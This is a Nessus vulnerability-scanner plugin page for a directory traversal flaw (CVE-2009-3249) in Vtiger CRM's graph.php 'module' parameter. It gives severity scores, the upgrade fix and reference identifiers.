Vtiger CRM graph.php Directory Traversal

high Nessus Plugin ID 52656

Synopsis

An application running on the remote web server is affected by a directory traversal vulnerability.

Description

The version of Vtiger installed on the remote host is vulnerable to a directory traversal attack because it fails to properly sanitize user- supplied input to the 'module' parameter of the 'graph.php' script.
An attacker can exploit this flaw to read arbitrary files from the remote server subject to the privileges of the affected web service.

Note that the version of Vtiger is also potentially affected by several other vulnerabilities, though Nessus has not tested for these.

Solution

Upgrade to Vtiger CRM 5.1.0 or later.

See Also

http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt

Plugin Details

Severity: High

ID: 52656

File Name: vtiger_504_dir_traversal.nasl

Version: 1.12

Type: remote

Family: CGI abuses

Published: 3/14/2011

Updated: 4/11/2022

Configuration: Enable thorough checks

Supported Sensors: Nessus

Risk Information

VPR

Risk Factor: High

Score: 7.3

CVSS v2

Risk Factor: High

Base Score: 7.5

Temporal Score: 5.9

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Information

Required KB Items: www/PHP

Excluded KB Items: Settings/disable_cgi_scanning

Exploit Ease: No exploit is required

Exploited by Nessus: true

Patch Publication Date: 7/22/2009

Vulnerability Publication Date: 8/18/2009

Exploitable With

Elliot (vtiger CRM 5.0.4 LFI)

Reference Information

CVE: CVE-2009-3249

BID: 36062

CWE: 22

SECUNIA: 36309